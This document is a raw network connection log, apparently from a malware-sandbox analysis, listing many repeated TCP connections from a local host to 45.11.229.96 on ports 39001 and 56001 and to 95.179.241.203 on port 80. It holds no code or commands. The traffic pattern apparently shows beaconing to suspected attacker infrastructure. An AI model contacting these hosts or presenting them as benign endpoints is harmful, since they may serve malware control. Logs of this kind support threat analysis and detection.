Sep 19, 2024 02:27:52.852977037 CEST	49905	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:52.859000921 CEST	39001	49905	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:53.490864038 CEST	39001	49905	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:53.492571115 CEST	49905	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:53.501652002 CEST	49905	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:53.506494999 CEST	39001	49905	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:53.877427101 CEST	49906	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:53.882539988 CEST	39001	49906	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:53.882633924 CEST	49906	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:54.049608946 CEST	49906	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:54.054733038 CEST	39001	49906	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:54.054814100 CEST	49906	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:54.059612036 CEST	39001	49906	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:54.063815117 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:54.072593927 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:54.072653055 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:54.077455997 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:54.522031069 CEST	39001	49906	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:54.522182941 CEST	49906	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:54.522293091 CEST	49906	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:54.527455091 CEST	39001	49906	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:54.612375975 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:54.642045021 CEST	49907	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:54.647011995 CEST	39001	49907	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:54.647111893 CEST	49907	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:54.668766975 CEST	49907	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:54.673527956 CEST	39001	49907	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:54.673598051 CEST	49907	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:54.678451061 CEST	39001	49907	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:54.719319105 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:54.756963968 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:54.758598089 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:54.763421059 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:54.763492107 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:54.768265963 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:55.275558949 CEST	39001	49907	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:55.276746988 CEST	49907	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:55.278935909 CEST	49907	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:55.283724070 CEST	39001	49907	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:55.403976917 CEST	49908	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:55.408968925 CEST	39001	49908	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:55.412815094 CEST	49908	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:56.916237116 CEST	49908	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:56.924190044 CEST	39001	49908	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:56.924330950 CEST	49908	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:56.929162025 CEST	39001	49908	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:57.236018896 CEST	39001	49908	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:57.236233950 CEST	49908	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:57.236233950 CEST	49908	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:57.241214991 CEST	39001	49908	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:57.345190048 CEST	49909	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:57.350126028 CEST	39001	49909	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:57.350214958 CEST	49909	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:57.374046087 CEST	49909	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:57.379028082 CEST	39001	49909	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:57.379085064 CEST	49909	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:57.383893013 CEST	39001	49909	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:58.000145912 CEST	39001	49909	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:58.000221968 CEST	49909	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:58.000483036 CEST	49909	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:58.005338907 CEST	39001	49909	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:58.111351967 CEST	49910	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:58.120150089 CEST	39001	49910	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:58.120227098 CEST	49910	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:58.614469051 CEST	49910	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:58.619364977 CEST	39001	49910	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:58.619457006 CEST	49910	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:58.624269962 CEST	39001	49910	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:58.824157000 CEST	39001	49910	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:58.824229956 CEST	49910	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:58.824398994 CEST	49910	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:58.831089020 CEST	39001	49910	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:58.939069986 CEST	49911	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:59.147886038 CEST	39001	49911	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:59.150307894 CEST	49911	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:00.526878119 CEST	49911	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:00.532403946 CEST	39001	49911	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:00.532552958 CEST	49911	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:00.538363934 CEST	39001	49911	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:00.890008926 CEST	39001	49911	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:00.890063047 CEST	49911	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:00.890193939 CEST	49911	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:00.895000935 CEST	39001	49911	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:01.010999918 CEST	49912	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:01.016201019 CEST	39001	49912	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:01.016303062 CEST	49912	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:01.040024042 CEST	49912	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:01.045056105 CEST	39001	49912	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:01.046274900 CEST	49912	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:01.053627968 CEST	39001	49912	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:01.676768064 CEST	39001	49912	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:01.678426027 CEST	49912	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:01.678426027 CEST	49912	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:01.684583902 CEST	39001	49912	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:01.789490938 CEST	49913	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:01.794837952 CEST	39001	49913	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:01.794929981 CEST	49913	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:01.854731083 CEST	49913	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:01.862653971 CEST	39001	49913	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:01.862704039 CEST	49913	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:01.868073940 CEST	39001	49913	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:02.411690950 CEST	80	49730	95.179.241.203	192.168.2.6
Sep 19, 2024 02:28:02.429003000 CEST	39001	49913	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:02.432992935 CEST	49913	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:02.484858036 CEST	49913	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:02.490360022 CEST	39001	49913	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:02.626317978 CEST	49914	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:02.631310940 CEST	39001	49914	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:02.632313967 CEST	49914	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:02.641211033 CEST	49730	80	192.168.2.6	95.179.241.203
Sep 19, 2024 02:28:02.674843073 CEST	49914	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:02.679842949 CEST	39001	49914	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:02.680408001 CEST	49914	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:02.685273886 CEST	39001	49914	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:03.315682888 CEST	39001	49914	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:03.315812111 CEST	49914	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:03.315937042 CEST	49914	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:03.320799112 CEST	39001	49914	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:03.423430920 CEST	49915	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:03.428756952 CEST	39001	49915	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:03.428858042 CEST	49915	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:04.186064959 CEST	49915	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:04.192507029 CEST	39001	49915	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:04.193315983 CEST	49915	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:04.199469090 CEST	39001	49915	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:04.586585999 CEST	39001	49915	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:04.588788033 CEST	49915	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:04.588993073 CEST	49915	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:04.593883038 CEST	39001	49915	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:04.836107016 CEST	49916	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:04.841991901 CEST	39001	49916	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:04.844770908 CEST	49916	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:05.535546064 CEST	49916	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:05.540694952 CEST	39001	49916	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:05.540769100 CEST	49916	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:05.545731068 CEST	39001	49916	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:05.867075920 CEST	39001	49916	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:05.867161989 CEST	49916	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:05.872239113 CEST	49916	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:05.882612944 CEST	39001	49916	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:06.048240900 CEST	49917	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:06.053272963 CEST	39001	49917	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:06.056451082 CEST	49917	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:06.099757910 CEST	49917	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:06.106690884 CEST	39001	49917	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:06.106848001 CEST	49917	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:06.111694098 CEST	39001	49917	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:06.719635010 CEST	39001	49917	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:06.719715118 CEST	49917	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:06.719841003 CEST	49917	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:06.724603891 CEST	39001	49917	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:06.838937998 CEST	49918	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:06.843944073 CEST	39001	49918	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:06.844376087 CEST	49918	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:08.857613087 CEST	49918	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:08.862593889 CEST	39001	49918	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:08.864453077 CEST	49918	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:08.869225025 CEST	39001	49918	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:09.287492990 CEST	39001	49918	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:09.287585020 CEST	49918	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:09.287709951 CEST	49918	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:09.292512894 CEST	39001	49918	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:09.392060995 CEST	49919	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:09.397409916 CEST	39001	49919	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:09.397505045 CEST	49919	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:11.382707119 CEST	49919	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:11.388088942 CEST	39001	49919	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:11.388170958 CEST	49919	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:11.392997980 CEST	39001	49919	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:11.895572901 CEST	39001	49919	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:11.895648003 CEST	49919	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:11.896033049 CEST	49919	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:11.905291080 CEST	39001	49919	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:12.001425028 CEST	49920	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:12.006696939 CEST	39001	49920	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:12.006800890 CEST	49920	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:12.030339956 CEST	49920	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:12.035482883 CEST	39001	49920	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:12.035584927 CEST	49920	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:12.040436983 CEST	39001	49920	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:12.650973082 CEST	39001	49920	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:12.654320002 CEST	49920	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:12.654397011 CEST	49920	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:12.659306049 CEST	39001	49920	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:12.767087936 CEST	49921	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:12.772222996 CEST	39001	49921	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:12.774337053 CEST	49921	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:14.394345045 CEST	49921	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:14.476536989 CEST	39001	49921	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:14.476892948 CEST	49921	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:14.481980085 CEST	39001	49921	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:14.918698072 CEST	39001	49921	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:14.918821096 CEST	49921	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:14.926547050 CEST	49921	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:14.931691885 CEST	39001	49921	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:15.054714918 CEST	49922	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:15.060120106 CEST	39001	49922	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:15.060219049 CEST	49922	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:15.087466955 CEST	49922	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:15.092437983 CEST	39001	49922	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:15.092530012 CEST	49922	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:15.098702908 CEST	39001	49922	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:15.944788933 CEST	39001	49922	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:15.944889069 CEST	49922	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:15.945005894 CEST	49922	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:15.951525927 CEST	39001	49922	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:16.051605940 CEST	49923	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:16.057609081 CEST	39001	49923	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:16.057723045 CEST	49923	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:16.233321905 CEST	49923	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:16.246587992 CEST	39001	49923	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:16.246682882 CEST	49923	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:16.253088951 CEST	39001	49923	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:16.724061012 CEST	39001	49923	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:16.724144936 CEST	49923	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:16.806737900 CEST	49923	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:16.811719894 CEST	39001	49923	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:17.048252106 CEST	49924	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:17.053339958 CEST	39001	49924	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:17.053445101 CEST	49924	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:17.084213018 CEST	49924	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:17.089158058 CEST	39001	49924	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:17.089242935 CEST	49924	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:17.095844984 CEST	39001	49924	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:17.714253902 CEST	39001	49924	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:17.714473009 CEST	49924	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:17.714556932 CEST	49924	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:17.719609976 CEST	39001	49924	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:17.830111980 CEST	49925	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:17.837446928 CEST	39001	49925	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:17.837563038 CEST	49925	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:17.862653971 CEST	49925	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:17.868467093 CEST	39001	49925	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:17.868556976 CEST	49925	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:17.874485016 CEST	39001	49925	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:18.487314939 CEST	39001	49925	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:18.487381935 CEST	49925	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:18.487545967 CEST	49925	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:18.492789030 CEST	39001	49925	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:18.602169991 CEST	49926	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:18.607072115 CEST	39001	49926	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:18.607191086 CEST	49926	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:19.104429960 CEST	49926	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:19.109492064 CEST	39001	49926	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:19.123569012 CEST	49926	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:19.128484964 CEST	39001	49926	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:19.639549017 CEST	39001	49926	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:19.641434908 CEST	49926	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:19.810483932 CEST	49926	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:19.815406084 CEST	39001	49926	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:19.941488981 CEST	49927	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:19.949048042 CEST	39001	49927	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:19.950325012 CEST	49927	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:19.984133005 CEST	49927	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:19.992973089 CEST	39001	49927	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:19.994326115 CEST	49927	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:20.000236988 CEST	39001	49927	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:20.598737001 CEST	39001	49927	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:20.598814964 CEST	49927	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:20.598968983 CEST	49927	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:20.603786945 CEST	39001	49927	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:20.713073969 CEST	49928	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:20.718435049 CEST	39001	49928	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:20.718527079 CEST	49928	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:21.358808994 CEST	49928	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:21.365533113 CEST	39001	49928	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:21.368542910 CEST	49928	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:21.375178099 CEST	39001	49928	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:21.776828051 CEST	39001	49928	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:21.776978016 CEST	49928	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:21.784578085 CEST	49928	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:21.790406942 CEST	39001	49928	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:21.989278078 CEST	49929	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:21.994411945 CEST	39001	49929	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:21.994479895 CEST	49929	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:22.084793091 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:22.090485096 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:22.090552092 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:22.095338106 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:22.150571108 CEST	49929	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:22.155462027 CEST	39001	49929	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:22.155534029 CEST	49929	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:22.161077023 CEST	39001	49929	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:22.597141981 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:22.647563934 CEST	39001	49929	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:22.648751020 CEST	49929	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:22.719360113 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:22.737477064 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:22.784758091 CEST	49929	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:22.790808916 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:22.792723894 CEST	39001	49929	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:22.795715094 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:22.795950890 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:22.800909042 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:22.899033070 CEST	49930	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:22.903940916 CEST	39001	49930	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:22.905168056 CEST	49930	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:22.946937084 CEST	49930	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:22.951987028 CEST	39001	49930	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:22.953254938 CEST	49930	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:22.958020926 CEST	39001	49930	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:23.539932013 CEST	39001	49930	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:23.540043116 CEST	49930	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:23.540144920 CEST	49930	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:23.544995070 CEST	39001	49930	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:23.658751965 CEST	49931	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:23.663650990 CEST	39001	49931	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:23.663746119 CEST	49931	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:24.094947100 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:24.100436926 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:24.102703094 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:24.109121084 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:24.154942036 CEST	49931	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:24.161634922 CEST	39001	49931	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:24.162308931 CEST	49931	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:24.167984962 CEST	39001	49931	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:24.437207937 CEST	80	49730	95.179.241.203	192.168.2.6
Sep 19, 2024 02:28:24.488218069 CEST	39001	49931	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:24.488960981 CEST	49931	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:24.489384890 CEST	49931	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:24.494230986 CEST	39001	49931	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:24.589795113 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:24.595412016 CEST	49932	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:24.606189013 CEST	39001	49932	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:24.606426001 CEST	49932	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:24.641241074 CEST	49730	80	192.168.2.6	95.179.241.203
